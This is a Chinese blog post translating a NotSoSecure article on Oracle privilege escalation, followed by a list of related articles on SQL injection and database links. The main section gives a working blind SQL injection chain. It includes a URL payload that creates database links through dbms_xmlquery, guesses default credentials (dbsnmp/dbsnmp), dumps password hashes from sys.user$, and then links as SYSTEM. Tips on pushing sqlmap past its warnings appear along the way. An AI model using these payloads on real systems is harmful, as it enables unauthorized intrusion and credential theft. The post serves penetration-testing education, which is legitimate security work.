[翻译]利用Oracle’s CREATE DATABASE LINK提权

最新推荐文章于 2023-03-04 14:32:57 发布
原创 最新推荐文章于 2023-03-04 14:32:57 发布 · 463 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #shell

本文介绍如何利用Oracle数据库的CREATEDATABASELINK权限进行SQL注入攻击,包括暴力破解用户名和密码、创建数据库链接以及获取敏感信息的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原文地址:[url]http://www.notsosecure.com/blog/2014/07/08/abusing-oracles-create-database-link-privilege-for-fun-and-profit/[/url]
Oracle数据库(以及其他数据库)提供创建连接到远端数据库服务器的database link功能。可以在远端的数据库上运行数据,并且返回结果。类似MS-SQL的Openrowset/Openquery特征。
[quote]
[color=blue]CREATE DATABASE LINK local
CONNECT TO USERNAME IDENTIFIED BY PASSWORD
USING 'ORCL_SID'[/color]
[/quote]
整型盲注
1. 通过BurpPro
2. 不能使用sqlmap
[b][color=red]TIP1这通常十次有九次成功,但是如果原本的id=5不返回任何记录,你将错过SQLi。所以为了返回记录,可以添加"or 1=1"[/color][/b]
sqlmap将会提示:
[quote]
"[13:24:41] [WARNING] it appears that you have provided tainted parameter values ('id=189881 or 1=1') with most probably leftover chars from manual SQL injection tests (;()') or non-valid numerical value. Please, always use only valid parameter values so sqlmap could be able to properly run
Are you sure you want to continue? [y/N] Y"
[/quote]
忽略警告,选择Y继续,接着SqlMap将会继续工作,你将会得到一个sql shell以及提取你希望的任何东西
[img]http://dl2.iteye.com/upload/attachment/0107/0878/406fd0ad-2923-3df8-aac3-82d5a6d29ed5.png[/img]
接下来发现数据库有这些权限:
[quote]
select privilege from session_privs [17]:
[*] CREATE SESSION
[*] UNLIMITED TABLESPACE
[*] CREATE TABLE
[b][*] CREATE DATABASE LINK[/b]
[/quote]
[color=red][b]TIP2:如果你有CREATE DATABASE LINK权限,你可以在SQLi中暴力破解/猜测user,如果成功,那么可以使用那个user来query[/b][/color]
url如下:
[quote]http://host/vuln.jsp?id=1 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''CREATE DATABASE LINK notsosecure_link CONNECT TO scott IDENTIFIED BY tiger USING ''''ORCL_SID'''' '';commit;end;') from dual) is not null[/quote]

经过几次尝试,我们获得user dbsnmp的默认口令dbsnmp,我们以dbsnmp创建一个link
[quote]sql-shell>select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''CREATE DATABASE LINK link2 CONNECT TO dbsnmp IDENTIFIED BY dbsnmp USING ''''ORCL_SID'''' '';commit;end;') from dual[/quote]
dbsnmp用户有“Select ANY Dictionary”权限,可以允许你读sys.user$中的密码hash
现在我们读取密码hash:
[quote]
sql-shell>select password from sys.user$@link2
[*] 286E1EA8F2CFD262
[*] 45B1C0C3BB1D853C
[*] 4A3BA55E08595C81
....
[/quote]
dbsnmp用户只有读取hash的权限,没有dba的角色。既然我们拥有了system用户的hash,我们现在可以破解,然后使用system user权限来创建hash:
[quote]sql-shell>select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''CREATE DATABASE LINK pwn CONNECT TO system IDENTIFIED BY system_password USING ''''ORCL_SID'''' '';commit;end;') from dual[/quote]
现在我们可以使用系统权限来执行任何query了。
Oracle创建数据链database link
tttzzzqqq2018的博客
08-10 415
【代码】Oracle创建数据链database link
Oracle创建Database link方法
月下独影灬的博客
09-21 3384
Oracle创建Database link方法
SQLmap注入学习实战 —— 宽字节注入与sqlmap进阶玩法
qq_40476955的博客
01-10 1万+
大晚上失眠了于是来写博客 你为啥这么勤奋 宽字节注入 这里的话,先上例题 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 来自南邮CTF 挺典型的一道宽字节注入的题目。 之前在笔记中写过为啥宽字节成立。 这里解释一下宽字节注入 应该只用于GBK编码的环境,然后开启了icov或者addslashes函数 %df’
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
weixin_46838716的博客
03-04 1921
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
sqlmap问题及解决办法
启航之路
05-24 1万+
真好,一个sqlmap注入问题困扰我一周,最后发现命令给错了。 事情是这样子的: 利用sqlmap对DVWA中Low进行SQL注入 输入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1 报错:不可注入…示 后来我根据示中的命令重新输入了一次,发现还是有问题(单独加cookie也不行) 吐了呀,一直以为环境有问题,sqlmap和python又重装了一遍。 然后用kali虚拟机注入,都一样结
墨者mysql注入_墨者靶场:SQL注入漏洞测试(参数加密) 使用sqlmap进行注入
weixin_30695935的博客
01-19 1415
墨者靶场:SQL注入漏洞测试(参数加密) 使用sqlmap进行注入前言首先这是一个很基础的题,实战中也会遇到。比如说前端利用JavaScript公钥加密并传输给后端,后端通过私钥进行解密执行。这样做的好处就在于可以有效的避免了中间人攻击。跟SSL原理差不多 只是SSL在传输层做的 这种加密在应用层做的。我从来不写百度能查到的writeup,因为这种行为是无意义的。要写就写一些干货。这才是文章的价值...
米斯特白帽培训讲义(v2)漏洞篇 SQL 注入
热门推荐
龙哥盟
03-02 4万+
米斯特白帽培训讲义 漏洞篇 SQL 注入 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理与危害SQL 注入就是指,在输入的字符串中注入 SQL 语句,如果应用相信用户的输入而对输入的字符串没进行任何的过滤处理,那么这些注入进去的 SQL 语句就会被数据库误认为是正常的 SQL 语句而被执行。恶意使用 SQL 注入攻击的人可以通过构建不同的 SQ
oracle create database link
最新发布
09-06
oracle create database link
Oracle创建Database Link的两种方式详解
09-10
Oracle数据库Database Link是连接不同数据库之间的一种机制,它允许用户在本地数据库上执行查询,同时访问远程数据库的数据,仿佛这些数据就在本地一样。Database LinkOracle数据库供的一种分布式数据库功能,...
Oracle DATABASE LINK(DBLINK)创建与删除方法
12-16
Oracle DATABASE LINK,简称DBLINK,是Oracle数据库供的一种机制,允许用户在不同的Oracle数据库实例间进行数据查询和操作,无需显式设置网络连接。DBLINK数据库间的通信供了桥梁,使得用户可以在本地数据库中...
ABAP自测试题一
aebe49167的博客
07-19 3460
这是我整理的ABAP认证的自测试题,如果大家有相关资料,欢迎交流........... 1. When does a BADI default implementation execute ---------------------------------------------------------- Only if the developer specif...
Oracle创建dblink数据库链接
Oasis
07-18 3021
我们想要创建dblink是该用户有创建dblink限。如果没有限是创建不了dblink的。那么我们只需要用管路员账号给该用户授予相应的限即可。
sqlmap用法
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
Database Link 详解
WHATIFSO
11-03 8086
一.创建Database Link        1) 限:创建数据库链接的帐号必须有CREATE DATABASE LINKCREATE PUBLIC DATABASELINK的系统限,用来登录到远程数据库的帐号必须有CREATE SESSION限。这两种限都包含在CONNECT角色中(CREATE PUBLIC DATABASE LINK限在DBA中)。一个公用数据库链接对于
ora-01031 限不足 database links
sjy_2010的专栏
03-28 2635
[code="sql"]grant create database link to scott;[/code]
创建oracle dblink限不足,oracle 创建dblink
weixin_39775428的博客
04-04 7386
创建DBlinkdatabaselink是定义一个数据库到另一个数据库的路径的对象,database link允许你查询远程表及执行远程程序。在任何分布式环境里,database都是必要的。另外要注意的是database link是单向的连接。创建DBlink需要的限:需要CREATEDATABASELINK限,如果是创建publicdatabase link,必须要包含CREATEPUBLI...
Oracle下创建database link两种方法
微风
05-10 1万+
数据库之间的链接建立在DATABASE LINK上。要创建一个DATABASE LINK,必须首先在建立链接的数据库上设置链接字符串,即配置一个远程数据库的本地网络服务名。
jeesite1.x 手动初始化数据库
天码星空
11-13 580
以MySQL数据库为例,先创建一个空的数据库,名称为jeesite 1.修改数据库连接信息 jeesite.properties 2.修改pom.xml的数据库初始化配置,如果是MySQL则无需修改,默认为MySQL(pom.xml有报错,先不用理会) 3. 到项目根目录下执行 maven命令 mvn antrun:run -Pinit-db 4.查看数据库,相关表已经创建完成。 5.注释掉pom.xml中的数据库初始化内容,以访重复创建数据。 ...
Oracle数据库查询:创建与使用Database Link详解
createdatabase link ORCL_LINK connect to dbuser identified by password using 'ORCL_REMOTE'; ``` 其中,`ORCL_LINK`是数据库链接的名称,`dbuser`是远程数据库的用户名,`password`是对应的密码,`ORCL_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值